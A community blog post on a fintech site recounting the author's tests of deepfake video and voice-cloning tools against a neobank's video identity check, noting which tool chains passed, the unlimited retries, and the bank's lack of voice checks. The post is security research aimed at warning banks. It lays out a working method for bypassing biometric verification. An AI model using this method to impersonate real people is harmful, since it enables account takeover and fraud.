Community
When a new tool called "Deepfake Offensive Toolkit" was released, claiming that now you can inject real-time deepfakes into your virtual camera and bypass biometric liveness checks, I was thrilled! As you may notice, all my last posts are related to fake identities and bypassing KYC checks in financial institutions. I thought, why not give it a go and bypass biometric verification with the power of Machine Learning?
Before putting everything in place, I needed to find a target app and establish testing conditions. After looking at a few neobanks on my phone, I found one that asked to provide a short video recording in some account resetting cases when the bank was unsure about your identity. You still had to have a lot of information at hand to get access to the account, such as photos of IDs, access to email and, potentially, card details. A decent deepfake requires hours of high-quality videos or photos of a person. All this is hard to get if the criminals don't know the victim. But everything changes if it is someone from the inside. Your teenage kid, your angry ex or your business partner will have photos of your ID, private videos and temporary access to your email and phone. This is our attacker.
Once we figured out the prerequisites, we can play with ML frameworks. But before we start making fake videos, we need to walk through the unmodified verification scenario to have a reference point. I reset the app, triggered the verification conditions, created a 640x480 video and, using my jailbroken iPhone, successfully submitted this video and passed the verification checks.
During the reference check, I found that:
- I can trigger the verification requests and automatically substitute video files for verification. - I can do as many verifications as I want. Even if one attempt fails, I can trigger another that won't be affected by the previous results. - Every verification will take a different time for approval, so it's likely done by humans.
Example 1. Deepfake Offensive Toolkit, try 1
I asked a friend with a similar haircut and facial features to record the test video and send it to me so I could apply the deepfake toolkit to the video. Unfortunately, the quality was not even satisfactory:
Status: verification wasn't initiated
Example 2. Deepfake Offensive Toolkit, try 2
After giving up on playing with different configuration options, I decided to apply my own photo to my own video!
This is something I can work with! At first, I was sure that the video verification procedure would fail and that I would have to provide more documents. But not at all! The verification came back successfully despite some obvious signs of video editing: blurry face, uneven facial edge and signs of video editing in the resulting file.
Status: verification passed
Example 3. DeepFaceLab, try 1
I learned that real-time deepfakes are far away from being realistic. But I didn't need a real-time substitution, so I tried another project – DeepFaceLab. This framework creates impressive results with the right quality video sources and enough resources spent on model training.
But to save some time, I started with the same requirement: to substitute myself for myself. I recorded a 1000-frame video of myself and then trained a SAEHD model to be placed on another video of mine:
This is a fake me, generated by the DFL framework. Again, signs of a deepfake are obvious. You can see the substituted blurry facial shape that can trick only a very poor eyesight person. But this also worked! So far, so good.
Example 4. DeepFaceLab, try 2
I took the original video that I requested from my friend and applied a re-trained model to this video:
It is a more decent-quality video than my first try but still far from perfection. A few problems here:
- Different face colours, making edges more obvious. As I found later, the right DFL model parameters fix this.
- A straight edge of the fringe shade. It could be rectified with the right destination video and the proper mask training.
- No glasses. It could trigger a red flag for video recognition services. Unfortunately, wearing glasses creates horrible artefacts. These conditions should be examined further.
- The destination recording had the wrong articulation, which could trigger another red flag.
Alas, this video didn't pass the checks. But I was sure it was possible to create the right video to pass the verification procedure.
Status: verification failed
Example 5. No glasses
No one was trying to block me permanently after a few failed checks. That’s amazing, I thought! That means I can try to determine some of the blackbox conditions of the verification process.
As glasses are integral to some humans' life, what if their absence is the main issue of the failed verification? I sent an unmodified video of myself without glasses. And I failed the verification! Even though absolutely nothing was changed!
Example 6. DeepNostalgia+Wav2lip+Face-SPARNet
Now that we know that glasses are crucial, I know what I need in the final video. There's only one problem: deepfakes with glasses were always very low quality.
One of the brilliant ML scientists, Alexander, suggested I look at https://www.myheritage.com/deep-nostalgia to animate my photo with glasses that won’t go outside my face shape. I used it to create a short video of myself:
Not the best quality, but not the worst either.
Now we need to get rid of the watermarks (apologies for that) and apply a wav2lip framework that will make me "pronounce" the words. That made the quality of the final video even lower, so I improved it with Face-SPARNet:
Unfortunately, the final quality was not good enough, and the verification failed.
Example 7. Animate Photos AI+Wav2lip+ Face-SPARNet+DeepFaceLab
At one point, something clicked in my head. If I have a three-second recording, I can take one photo of a victim, create an animated video from only that photo and then reapply high-res sources to it using DeepFaceLab to improve the quality drastically! The final steps where existing problems of the previous examples have been addressed: 1. The DFL destination video quality was improved by purchasing Animate Photos AI (https://pixbim.com/animate-photos-pixbim). That also helped with removing the watermarks. 2. Animate Photos AI detects the face and makes a square video, so I had to "fool" the algorithm so it would make a video I can cut after into a 640x480 product:
3. Wav2lip and post-editing with Face-SPARNet created some additional artefacts at the bottom of the video:
Wav2lip-HQ fork was not making a lipsync of enough quality. So I recorded lips saying what I need and put them on top of the video. As this will be substituted using DFL later, it doesn't matter!
5. Take the rest of the high-res video of the "victim" and use it as an SRC for DFL. I trained the SAEHD model using Google Colab from scratch, and honestly, the results were impressive: https://drive.google.com/file/d/1Ei9W5t9KDOLZUtfrXgjmAfWJVEVLejoM/view?usp=sharing
Final example. RealTimeVoiceCloning
When I was testing if the lipsync could be a problem, I decided to make a video where the lips are not showing what the voice is saying. In addition to that I decided to generate a completely artificial voice. The insider can have recordings of the victim’s voice but hardly would have the exact sentence the bank expects him to say. And because this article is about deepfake tools, I took the RealTimeVoiceCloning framework. After short learning on 10-15 mins of voice, I produced a decent quality voice fake saying whatever I wished:
https://drive.google.com/file/d/1Dseplf_nbtact6rTKPScpe19UhYRl_WD/view?usp=sharing
As you hear, this voice sounds quite far from my original voice. In addition to that, I recorded a video with me saying different words from the words on audio:
So again, I wasn't sure if I would pass the verification.
It worked! It means the bank employees don’t have a reference for my voice. Whoever checks the recordings pays more attention to the video than the audio.
Reflections on the verification testing process.
Recommendations for banks.
And pretty much to everyone who relies on photo/video/audio verifications:
These days it's fairly simple to create deepfake content not only for a proof of concept or a funny TikTok video. Using open source tools or commercial mass products, criminals with enough patience and even shallow understanding of technology can bypass banks' restrictions.
This content is provided by an external author without editing by Finextra. It expresses the views and opinions of the author.
Ellison Anne Williams CEO at Enveil
30 October
Damien Dugauquier Co-Founder & CEO at iPiD
Kyrylo Reitor Chief Marketing Officer at International Fintech Business
Prashant Bhardwaj Innovation Manager at Crif
Welcome to Finextra. We use cookies to help us to deliver our services. You may change your preferences at our Cookie Centre.
Please read our Privacy Policy.